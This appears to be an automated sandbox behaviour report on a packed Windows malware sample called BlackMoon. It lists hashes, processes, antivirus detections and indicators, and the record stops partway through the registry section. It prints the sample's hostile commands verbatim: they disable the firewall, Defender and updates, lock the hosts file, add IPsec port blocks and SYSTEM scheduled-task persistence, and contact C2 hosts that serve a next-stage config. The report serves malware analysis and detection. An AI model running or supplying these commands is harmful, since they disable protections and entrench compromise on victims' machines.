· 6 years ago · Oct 18, 2019, 02:12 PM
2* ID: 5936
3* MalFamily: "BlackMoon"
4
5* MalScore: 10.0
6
7* File Name: "Exes_d63f49973284b14a0eecc00e8ec1bc42.exe"
8* File Size: 5674496
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
10* SHA256: "7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd"
11* MD5: "d63f49973284b14a0eecc00e8ec1bc42"
12* SHA1: "31c716f4fb5badc1cada2b29e706e9473d23efe4"
13* SHA512: "b76f22c91c32ab23a0e6ac4788dd1571c6a6c54af04331ce19aa4cc857a8715c16ba1d2d892c059c0a47e7ccea76414e18e6fcf788b47892455f59ed9d3ea591"
14* CRC32: "E35A8275"
15* SSDEEP: "98304:LzJ9Q7DjJMHgm3bAZdYetOOSVBMCcmvHEVfDX8vb1OFWeK2JE+24VU554fZjEUMz:LLQ7Dj8ZcEcOhmYBOFWeKtLp54BoUfZI"
16
17* Process Execution:
18 "3cCNvvAhkAztO.exe",
19 "cmd.exe",
20 "PING.EXE",
21 "bmrtbgt.exe",
22 "services.exe",
23 "bmrtbgt.exe",
24 "nqecnaywtfdomyw18026.exe",
25 "cmd.exe",
26 "cmd.exe",
27 "cacls.exe",
28 "cmd.exe",
29 "cacls.exe",
30 "cmd.exe",
31 "cacls.exe",
32 "netsh.exe",
33 "netsh.exe",
34 "netsh.exe",
35 "cmd.exe",
36 "cmd.exe",
37 "schtasks.exe",
38 "netsh.exe",
39 "netsh.exe",
40 "netsh.exe",
41 "netsh.exe",
42 "netsh.exe",
43 "netsh.exe",
44 "netsh.exe",
45 "netsh.exe",
46 "netsh.exe",
47 "netsh.exe",
48 "netsh.exe",
49 "netsh.exe",
50 "cmd.exe",
51 "net.exe",
52 "net1.exe",
53 "cmd.exe",
54 "netsh.exe",
55 "cmd.exe",
56 "netsh.exe",
57 "cmd.exe",
58 "net.exe",
59 "net1.exe",
60 "cmd.exe",
61 "net.exe",
62 "net1.exe",
63 "cmd.exe",
64 "net.exe",
65 "net1.exe",
66 "cmd.exe",
67 "sc.exe",
68 "cmd.exe",
69 "sc.exe",
70 "cmd.exe",
71 "svchost.exe",
72 "svchost.exe",
73 "WmiApSrv.exe",
74 "svchost.exe",
75 "WerFault.exe",
76 "WerFault.exe",
77 "wermgr.exe",
78 "svchost.exe",
79 "svchost.exe",
80 "WmiPrvSE.exe"
81
82
83* Executed Commands:
84 "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe",
85 "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
86 "C:\\Windows\\crbuqquc\\bmrtbgt.exe",
87 "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
88 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
89 "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
90 "C:\\Windows\\system32\\svchost.exe -k netsvcs",
91 "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
92 "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
93 "netsh ipsec static delete all",
94 "netsh ipsec static add policy name=Bastards description=FuckingBastards",
95 "netsh ipsec static add filteraction name=BastardsList action=block",
96 "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\"",
97 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
98 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
99 "netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList",
100 "netsh ipsec static set policy name=Bastards assign=y",
101 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
102 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
103 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP",
104 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP",
105 "cmd /c net stop SharedAccess",
106 "cmd /c netsh firewall set opmode mode=disable",
107 "cmd /c netsh Advfirewall set allprofiles state off",
108 "cmd /c net stop MpsSvc",
109 "cmd /c net stop WinDefend",
110 "cmd /c net stop wuauserv",
111 "cmd /c sc config MpsSvc start= disabled",
112 "cmd /c sc config SharedAccess start= disabled",
113 "cmd /c sc config WinDefend start= disabled",
114 "cmd /c sc config wuauserv start= disabled",
115 "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
116 "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
117 "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
118 "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
119 "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\"",
120 "C:\\Windows\\system32\\WerFault.exe -u -p 2480 -s 1200",
121 "C:\\Windows\\system32\\WerFault.exe -u -p 2480 -s 1204",
122 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\"",
123 "net stop SharedAccess",
124 "netsh firewall set opmode mode=disable",
125 "C:\\Windows\\system32\\net1 stop SharedAccess",
126 "netsh Advfirewall set allprofiles state off",
127 "net stop MpsSvc",
128 "net stop WinDefend",
129 "net stop wuauserv",
130 "C:\\Windows\\system32\\net1 stop MpsSvc",
131 "C:\\Windows\\system32\\net1 stop WinDefend",
132 "sc config MpsSvc start= disabled",
133 "C:\\Windows\\system32\\net1 stop wuauserv",
134 "sc config SharedAccess start= disabled",
135 "sc config WinDefend start= disabled"
136
137
138* Signatures Detected:
139
140 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
141 "Details":
142
143
144 "Description": "At least one process apparently crashed during execution",
145 "Details":
146
147
148 "Description": "Scheduled file move on reboot detected",
149 "Details":
150
151 "File Move on Reboot": "Old: C:\\Users\\user\\AppData\\Local\\Temp\\3cCNvvAhkAztO.exe -> New: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile"
152
153
154 "File Move on Reboot": "Old: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\ -> New: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile"
155
156
157 "File Move on Reboot": "Old: C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe -> New: C:\\Windows\\Temp\\17918640\\....\\TemporaryFile"
158
159
160 "File Move on Reboot": "Old: C:\\Windows\\Temp\\17918640\\....\\ -> New: C:\\Windows\\Temp\\17918640\\TemporaryFile"
161
162
163 "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer"
164
165
166
167
168 "Description": "Possible date expiration check, exits too soon after checking local time",
169 "Details":
170
171 "process": "cmd.exe, PID 2252"
172
173
174
175
176 "Description": "Anomalous file deletion behavior detected (10+)",
177 "Details":
178
179 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile\\TemporaryFile"
180
181
182 "DeletedFile": "C:\\Windows\\Temp\\17918640\\TemporaryFile\\TemporaryFile"
183
184
185 "DeletedFile": "C:\\Windows\\Tasks\\ujqftiylp.job"
186
187
188 "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
189
190
191 "DeletedFile": "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan"
192
193
194 "DeletedFile": "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask"
195
196
197 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp"
198
199
200 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
201
202
203 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
204
205
206 "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp"
207
208
209 "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml"
210
211
212 "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp"
213
214
215 "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt"
216
217
218 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
219
220
221 "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml"
222
223
224 "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt"
225
226
227
228
229 "Description": "Guard-page use detected (possible anti-debugging).",
230 "Details":
231
232
233 "Description": "A process attempted to delay the analysis task.",
234 "Details":
235
236 "Process": "netsh.exe tried to sleep 1060 seconds, actually delayed analysis time by 0 seconds"
237
238
239
240
241 "Description": "Performs HTTP requests potentially not found in PCAP.",
242 "Details":
243
244 "url_ioc": "aj.0x0x0x0x0.best:63145//cfg.ini"
245
246
247 "url_ioc": "xs.0x0x0x0x0.club:63145//cfg.ini"
248
249
250 "url_ioc": "ui.0x0x0x0x0.xyz:63145//cfg.ini"
251
252
253 "url_ioc": "qb.1c1c1c1c.best:63145//cfg.ini"
254
255
256
257
258 "Description": "Starts servers listening on 0.0.0.0:0, :0",
259 "Details":
260
261
262 "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
263 "Details":
264
265
266 "Description": "Drops a binary and executes it",
267 "Details":
268
269 "binary": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
270
271
272 "binary": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
273
274
275 "binary": "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe"
276
277
278
279
280 "Description": "The binary likely contains encrypted or compressed data.",
281 "Details":
282
283 "section": "name: UPX1, entropy: 7.80, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00568e00, virtual_size: 0x00569000"
284
285
286
287
288 "Description": "The executable is compressed using UPX",
289 "Details":
290
291 "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00153000"
292
293
294
295
296 "Description": "A ping command was executed with the -n argument, possibly to delay analysis",
297 "Details":
298
299 "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
300
301
302 "command": "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5"
303
304
305
306
307 "Description": "Uses Windows utilities for basic functionality",
308 "Details":
309
310 "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
311
312
313 "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
314
315
316 "command": "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5"
317
318
319 "command": "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
320
321
322 "command": "netsh ipsec static delete all"
323
324
325 "command": "netsh ipsec static add policy name=Bastards description=FuckingBastards"
326
327
328 "command": "netsh ipsec static add filteraction name=BastardsList action=block"
329
330
331 "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
332
333
334 "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
335
336
337 "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
338
339
340 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP"
341
342
343 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP"
344
345
346 "command": "netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList"
347
348
349 "command": "netsh ipsec static set policy name=Bastards assign=y"
350
351
352 "command": "netsh ipsec static set policy name=Bastards assign=y"
353
354
355 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP"
356
357
358 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP"
359
360
361 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP"
362
363
364 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP"
365
366
367 "command": "cmd /c net stop SharedAccess"
368
369
370 "command": "cmd /c net stop SharedAccess"
371
372
373 "command": "cmd /c netsh firewall set opmode mode=disable"
374
375
376 "command": "cmd /c netsh firewall set opmode mode=disable"
377
378
379 "command": "cmd /c netsh firewall set opmode mode=disable"
380
381
382 "command": "cmd /c netsh Advfirewall set allprofiles state off"
383
384
385 "command": "cmd /c netsh Advfirewall set allprofiles state off"
386
387
388 "command": "cmd /c netsh Advfirewall set allprofiles state off"
389
390
391 "command": "cmd /c net stop MpsSvc"
392
393
394 "command": "cmd /c net stop MpsSvc"
395
396
397 "command": "cmd /c net stop WinDefend"
398
399
400 "command": "cmd /c net stop WinDefend"
401
402
403 "command": "cmd /c net stop wuauserv"
404
405
406 "command": "cmd /c net stop wuauserv"
407
408
409 "command": "cmd /c sc config MpsSvc start= disabled"
410
411
412 "command": "cmd /c sc config MpsSvc start= disabled"
413
414
415 "command": "cmd /c sc config SharedAccess start= disabled"
416
417
418 "command": "cmd /c sc config SharedAccess start= disabled"
419
420
421 "command": "cmd /c sc config WinDefend start= disabled"
422
423
424 "command": "cmd /c sc config WinDefend start= disabled"
425
426
427 "command": "cmd /c sc config wuauserv start= disabled"
428
429
430 "command": "cmd /c sc config wuauserv start= disabled"
431
432
433 "command": "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\""
434
435
436 "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
437
438
439 "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
440
441
442 "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
443
444
445 "command": "net stop SharedAccess"
446
447
448 "command": "netsh firewall set opmode mode=disable"
449
450
451 "command": "netsh firewall set opmode mode=disable"
452
453
454 "command": "netsh Advfirewall set allprofiles state off"
455
456
457 "command": "netsh Advfirewall set allprofiles state off"
458
459
460 "command": "net stop MpsSvc"
461
462
463 "command": "net stop WinDefend"
464
465
466 "command": "net stop wuauserv"
467
468
469 "command": "sc config MpsSvc start= disabled"
470
471
472 "command": "sc config SharedAccess start= disabled"
473
474
475 "command": "sc config WinDefend start= disabled"
476
477
478
479
480 "Description": "Deletes its original binary from disk",
481 "Details":
482
483
484 "Description": "Behavioural detection: Transacted Hollowing",
485 "Details":
486
487
488 "Description": "Attempts to stop active services",
489 "Details":
490
491 "servicename": "MPSSVC"
492
493
494 "servicename": "WINDEFEND"
495
496
497 "servicename": "WUAUSERV"
498
499
500
501
502 "Description": "Repeatedly calls a single API many times in order to delay analysis",
503 "Details":
504
505 "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 9465367 times"
506
507
508
509
510 "Description": "Behavior consistent with a dropper attempting to download the next stage.",
511 "Details":
512
513 "File": "/cfg.ini was requested from hosts: aj.0x0x0x0x0.best, xs.0x0x0x0x0.club, ui.0x0x0x0x0.xyz, qb.1c1c1c1c.best"
514
515
516
517
518 "Description": "Attempts to execute a Living Off The Land Binary command for post-exploitation",
519 "Details":
520
521 "MITRE T1053.005 - schtasks (Scheduled Task)": "(Tactic: Execution, Persistence, Privilege Escalation)"
522
523
524
525
526 "Description": "Installs itself for autorun at Windows startup",
527 "Details":
528
529 "service name": "pmtypkytl"
530
531
532 "service path": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
533
534
535 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger"
536
537
538 "data": "C:\\Windows\\system32\\svchost.exe"
539
540
541 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe\\Debugger"
542
543
544 "data": "C:\\Windows\\system32\\svchost.exe"
545
546
547 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe\\Debugger"
548
549
550 "data": "C:\\Windows\\system32\\svchost.exe"
551
552
553 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe\\Debugger"
554
555
556 "data": "C:\\Windows\\system32\\svchost.exe"
557
558
559 "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
560
561
562
563
564 "Description": "File has been identified by 56 Antiviruses on VirusTotal as malicious",
565 "Details":
566
567 "MicroWorld-eScan": "Generic.Backdoor.Torr.22F25429"
568
569
570 "FireEye": "Generic.mg.d63f49973284b14a"
571
572
573 "CAT-QuickHeal": "Trojanpws.Qqpass.16554"
574
575
576 "McAfee": "Artemis!D63F49973284"
577
578
579 "Cylance": "Unsafe"
580
581
582 "VIPRE": "Trojan.Win32.Generic!BT"
583
584
585 "K7AntiVirus": "Adware ( 005070c51 )"
586
587
588 "Alibaba": "VirTool:Win32/CeeInject.497cc0bc"
589
590
591 "K7GW": "Adware ( 005070c51 )"
592
593
594 "Cybereason": "malicious.73284b"
595
596
597 "Arcabit": "Generic.Backdoor.Torr.22F25429"
598
599
600 "Invincea": "heuristic"
601
602
603 "Symantec": "Trojan.Gen.MBT"
604
605
606 "APEX": "Malicious"
607
608
609 "ClamAV": "Win.Trojan.BlackMoon-7136668-0"
610
611
612 "Kaspersky": "HEUR:Trojan.Win32.Generic"
613
614
615 "BitDefender": "Generic.Backdoor.Torr.22F25429"
616
617
618 "NANO-Antivirus": "Trojan.Win32.MS17010.gcobuw"
619
620
621 "AegisLab": "Trojan.Win32.Generic.4!c"
622
623
624 "Avast": "Win32:Malware-gen"
625
626
627 "Ad-Aware": "Generic.Backdoor.Torr.22F25429"
628
629
630 "Sophos": "Generic PUA DB (PUA)"
631
632
633 "Comodo": "Packed.Win32.MUPX.Gen@24tbus"
634
635
636 "F-Secure": "Heuristic.HEUR/AGEN.1014775"
637
638
639 "DrWeb": "Trojan.Hosts.46779"
640
641
642 "Zillya": "Trojan.Generic.Win32.955214"
643
644
645 "TrendMicro": "TROJ_GEN.R002C0WJ319"
646
647
648 "McAfee-GW-Edition": "BehavesLike.Win32.Injector.tc"
649
650
651 "Emsisoft": "Generic.Backdoor.Torr.22F25429 (B)"
652
653
654 "SentinelOne": "DFI - Malicious PE"
655
656
657 "Cyren": "W32/Kryptik.AHP.gen!Eldorado"
658
659
660 "Webroot": "W32.Malware.Gen"
661
662
663 "Avira": "HEUR/AGEN.1014775"
664
665
666 "Antiy-AVL": "HackTool/Win64.Mimikatz.a"
667
668
669 "Microsoft": "Trojan:Win32/Dynamer!rfn"
670
671
672 "Endgame": "malicious (moderate confidence)"
673
674
675 "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
676
677
678 "GData": "Win32.Trojan.Agent.WP"
679
680
681 "AhnLab-V3": "Malware/Win32.Generic.C3367812"
682
683
684 "Acronis": "suspicious"
685
686
687 "VBA32": "BScope.Trojan.Occamy"
688
689
690 "ALYac": "Generic.Backdoor.Torr.22F25429"
691
692
693 "MAX": "malware (ai score=85)"
694
695
696 "Malwarebytes": "RiskWare.BlackMoon.UPX"
697
698
699 "ESET-NOD32": "a variant of Win32/Packed.BlackMoon.A potentially unwanted"
700
701
702 "TrendMicro-HouseCall": "TROJ_GEN.R002C0WJ319"
703
704
705 "Rising": "Trojan.Downloader!1.B837 (TFE:5:AvnUCUT9PKC)"
706
707
708 "Yandex": "Trojan.Agent!B7b1rLf/4AM"
709
710
711 "Ikarus": "Trojan-PSW.QQpass"
712
713
714 "eGambit": "hacktool.mimikatz"
715
716
717 "Fortinet": "W32/Kryptik.AHP!tr"
718
719
720 "MaxSecure": "Trojan.Malware.300983.susgen"
721
722
723 "AVG": "FileRepMalware"
724
725
726 "Panda": "Trj/Genetic.gen"
727
728
729 "CrowdStrike": "win/malicious_confidence_90% (W)"
730
731
732 "Qihoo-360": "HEUR/QVM11.1.4D0D.Malware.Gen"
733
734
735
736
737 "Description": "Checks the system manufacturer, likely for anti-virtualization",
738 "Details":
739
740
741 "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
742 "Details":
743
744 "target": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
745
746
747 "dropped": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd , guest_paths:C:\\Windows\\crbuqquc\\bmrtbgt.exe*C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
748
749
750 "dropped": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:8b668cb3af54aa46714a92d31e5e189b96ddda5bd3fdb98dc567e3c3f40fba83 , guest_paths:C:\\Windows\\crbuqquc\\bmrtbgt.exe*C:\\Windows\\Fonts\\bmrtbgt.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
751
752
753
754
755 "Description": "Creates a copy of itself",
756 "Details":
757
758 "copy": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
759
760
761 "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile"
762
763
764
765
766 "Description": "The sample wrote data to the system hosts file.",
767 "Details":
768
769
770 "Description": "Collects information to fingerprint the system",
771 "Details":
772
773
774 "Description": "Uses suspicious command line tools or Windows utilities",
775 "Details":
776
777 "command": "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
778
779
780 "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users"
781
782
783 "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators"
784
785
786 "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
787
788
789
790
791
792* Started Service:
793 "pmtypkytl",
794 "WerSvc",
795 "IKEEXT",
796 "PolicyAgent",
797 "wmiApSrv"
798
799
800* Mutexes:
801 "RasPbFile",
802 "IESQMMUTEX_0_208",
803 "Global\\RefreshRA_Mutex_Lib",
804 "Global\\RefreshRA_Mutex",
805 "Global\\RefreshRA_Mutex_Flag",
806 "Global\\WmiApSrv",
807 "Local\\WERReportingForProcess2480",
808 "Global\\\\xe5\\x88\\x90\\xc8\\x93",
809 "DBWinMutex",
810 "Global\\\\xee\\xbb\\xb0\\xcd\\x96",
811 "WERUI_APPCRASH-548ba4ac92e4eee4a48cdad23d45ab0c2171"
812
813
814* Modified Files:
815 "C:\\Windows\\crbuqquc\\bmrtbgt.exe",
816 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile",
817 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile",
818 "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
819 "C:\\Windows\\System32\\drivers\\etc\\hosts",
820 "C:\\Windows\\Temp\\kcrlpplil\\grltlilub.exe",
821 "C:\\Windows\\Fonts\\bmrtbgt.exe",
822 "C:\\Windows\\Temp\\17918640\\....\\TemporaryFile",
823 "C:\\Windows\\Temp\\17918640\\TemporaryFile",
824 "\\Device\\NamedPipe",
825 "\\Device\\Http\\Communication",
826 "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
827 "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
828 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
829 "\\??\\WMIDataDevice",
830 "\\??\\PIPE\\samr",
831 "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
832 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
833 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
834 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
835 "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
836 "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
837 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
838 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
839 "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt",
840 "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml",
841 "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt",
842 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER2667.tmp.appcompat.txt",
843 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER70DF.tmp.WERInternalMetadata.xml",
844 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER7842.tmp.WERDataCollectionFailure.txt",
845 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer",
846 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp"
847
848
849* Deleted Files:
850 "C:\\Users\\user\\AppData\\Local\\Temp\\3cCNvvAhkAztO.exe",
851 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\",
852 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile\\TemporaryFile",
853 "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
854 "C:\\Windows\\Temp\\17918640\\....\\",
855 "C:\\Windows\\Temp\\17918640\\TemporaryFile\\TemporaryFile",
856 "C:\\Windows\\Tasks\\ujqftiylp.job",
857 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
858 "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
859 "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
860 "C:\\Windows\\Temp\\WER2667.tmp",
861 "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt",
862 "C:\\Windows\\Temp\\WER70DF.tmp",
863 "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml",
864 "C:\\Windows\\Temp\\WER7842.tmp",
865 "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt",
866 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp"
867
868
869* Modified Registry Keys:
870 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
